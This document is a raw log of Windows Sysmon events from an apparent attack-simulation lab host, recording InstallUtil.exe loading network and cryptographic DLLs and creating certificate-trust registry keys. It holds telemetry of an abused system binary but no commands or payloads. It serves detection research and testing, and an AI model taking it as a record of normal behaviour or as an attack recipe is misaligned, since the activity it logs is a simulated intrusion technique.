WindowsValid 734700x800000000000000057558300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\wintrust.dll10.0.14393.4530 (rs1_release.210705-0736)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=74DAF9377A91E093E18662274194465F,SHA256=6D74811A86A105CBF6B4E0267A4BF0C3D303618D6AEFBD87CAEC6503FF35D997trueMicrosoft WindowsValid 734700x800000000000000057558275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\dpapi.dll10.0.14393.0 (rs1_release.160715-1616)Data Protection APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdpapi.dllMD5=D204C988115DD69889E3C0172E92BCFF,SHA256=3F3ED7720F970CA1704BF5215C574ED9FF19778C57E2D484180DA2D8361B130DtrueMicrosoft WindowsValid 734700x800000000000000057558240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ntasn1.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft ASN.1 APIMicrosoft® Windows® Operating SystemMicrosoft Corporationntasn1.dllMD5=CDA0441BE02BB525B159B3949D9DC67D,SHA256=4977F6560E6B355299CB160CBFA411E0EDA83558AE15E8E323CD5BA02351C6CAtrueMicrosoft WindowsValid 734700x800000000000000057558220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ncrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows NCrypt RouterMicrosoft® Windows® Operating SystemMicrosoft Corporationncrypt.dllMD5=A9005C06D4F367BF4B8C6FB9C4B42AE7,SHA256=0539649D648911F05F93B06C2A1F9827C9BDBED1928A932223DB12A3FFB83919trueMicrosoft WindowsValid 734700x800000000000000057558195Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mskeyprotect.dll10.0.14393.4046 (rs1_release.201028-1803)Microsoft Key Protection ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmskeyprotect.dllMD5=D9702DF4C37BE14869F2645CA77D0561,SHA256=056156B54F6468B454F324F20B3FB332F06B28120331BD86168BC2666385B339trueMicrosoft WindowsValid 734700x800000000000000057558166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.259{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=5E8336C79BE0C2F1080B575E434DD0E4,SHA256=FB7EB70237B5897F875CE8786C26E09F61120DB4A91376A65433EEDCFA634A11trueMicrosoft WindowsValid 734700x800000000000000057558143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.259{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=33E4F8ECEA33AC2AAB8C336A0C11AAA7,SHA256=EE44DEE528EB91D80BB3DE79DBDD7E135A51FD6EF2AF360B6DB8A3CB0C297D1BtrueMicrosoft WindowsValid 734700x800000000000000057558114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.244{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\schannel.dll10.0.14393.4225 (rs1_release.210127-1811)TLS / SSL Security ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationschannel.dllMD5=A9577E37C01F2AC118012CB0F810CB01,SHA256=0BC1D3056283C7579FFCF913B55357EBB0AEB3E8E39E8C053B654228EA224EA9trueMicrosoft WindowsValid 734700x800000000000000057558091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.244{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=FEC73B133C8A34087EF9E872CD1CD45E,SHA256=4BF805F38A47FAFE9E039DE56DD1B9E36B40561C6D3FD3C75907F35CAA91D9A6trueMicrosoft WindowsValid 734700x800000000000000057558067Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=CDDE3316B3736A9613F31610AC137C9E,SHA256=545CD6206CC1CD22A7CE8B4845CFCE3E06AAD97D4334588A52F0F143CC8AD171trueMicrosoft WindowsValid 734700x800000000000000057558039Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\winnsi.dll10.0.14393.2339 (rs1_release_inmarket.180611-1502)Network Store Information RPC interfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationwinnsi.dllMD5=5777A6C6196919EBE8B73B273DF5FAF6,SHA256=062F973C688650068FD4B3E2EB0E474CE204120ED3E18CDC341C0A3E528C7839trueMicrosoft WindowsValid 734700x800000000000000057558014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=F18662FD1BCB04019CA35313C7BD1AB0,SHA256=44968455D3EEA914958BF90A83BA9311E9311676C32D8D46BB6109DF655738A4trueMicrosoft WindowsValid 734700x800000000000000057557989Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=F5FF215A5AE295644FE12BEAF6B75D00,SHA256=714EEB3B620CC9E368813728B1D247684519A3181211CDB5FCC37451F9BC2B96trueMicrosoft WindowsValid 734700x800000000000000057557963Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.213{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=380F0481E3BA9EA699BB6F674A500745,SHA256=ED5F6D3E1F27292480800E540E5F60CF8E8A157B52AC47ACA8B81F57F63F30F0trueMicrosoft WindowsValid 734700x800000000000000057557937Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.213{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\OnDemandConnRouteHelper.dll10.0.14393.0 (rs1_release.160715-1616)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=DF275C9659ED8215695B572A8CE17FBC,SHA256=D8F3C962E828201B361A6F634412B7BE25EC1BD3F848F259E3C996BB9572B0FBtrueMicrosoft WindowsValid 734700x800000000000000057557911Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.213{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=89AC96525FB527CDF4FFDCDF657A3923,SHA256=737BC5E7586D9AB6306949B1470DB3DBE576638A010EEF7A297126BE30841C2FtrueMicrosoft WindowsValid 734700x800000000000000057557884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.213{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\wininet.dll11.00.14393.4583 (rs1_release.210730-1850)Internet Extensions for Win32Internet ExplorerMicrosoft Corporationwininet.dllMD5=784B673E2ECF5794AA77952B0CD9EDA3,SHA256=5C4032070D904CED9173CE28B36F48FD28F8FEECB3CA34A89020EA707A008357trueMicrosoft WindowsValid 12241200x800000000000000057557871Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.369{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057557870Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.353{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000057557867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.166{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\ca3f8925ea2e2c087b39a31868d01790\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D852391DF1D1D0ABD8DC0B947CDED66C,SHA256=B7B29E7192EE074DDF8F08F53E074813B0F2578F1464559E7359F1855ECEA751false-Unavailable 12241200x800000000000000057557866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057557865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057557864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057557863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057557861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057557860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057557858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000057557848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.134{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cryptsp.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=940907E5BEF86AF8B1D4C6FF2A98061E,SHA256=6F87C4B18D0A22A7A01C3F2176A18229B78106C9A7FC3F878892F0FD9706040CtrueMicrosoft WindowsValid 734700x800000000000000057557818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.134{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives Library (Wow64)Microsoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=80F9B9D2B1258D35F129D9210DC9CE20,SHA256=9653E29AA9499123EBFA49C4BA69E345F8A10029B00B790946DDFE040436EF6DtrueMicrosoft WindowsValid 734700x800000000000000057557800Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.134{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValid 13241300x800000000000000057557781Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057557780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057557779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057557778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 12241200x800000000000000057557753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs 12241200x800000000000000057557752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs 12241200x800000000000000057557751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates 12241200x800000000000000057557750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x800000000000000057557749Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x800000000000000057557748Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057557747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057557746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057557745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x800000000000000057557744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057557743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057557742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057557741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057557740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057557739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057557738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057557737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057557736Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x800000000000000057557735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057557734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057557733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057557732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057557731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057557730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs 12241200x800000000000000057557729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs 734700x800000000000000057557728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.134{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B745CDE6791890C571B08D4E29D9174E,SHA256=08B93AC421A1DA6CC4F0FE683F10C3B7679A42395854BB54CB63B5DFD5BF58BEtrueMicrosoft WindowsValid 12241200x800000000000000057557727Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates 12241200x800000000000000057557726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x800000000000000057557725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x800000000000000057557724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057557723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057557722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057557721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057557720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057557719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 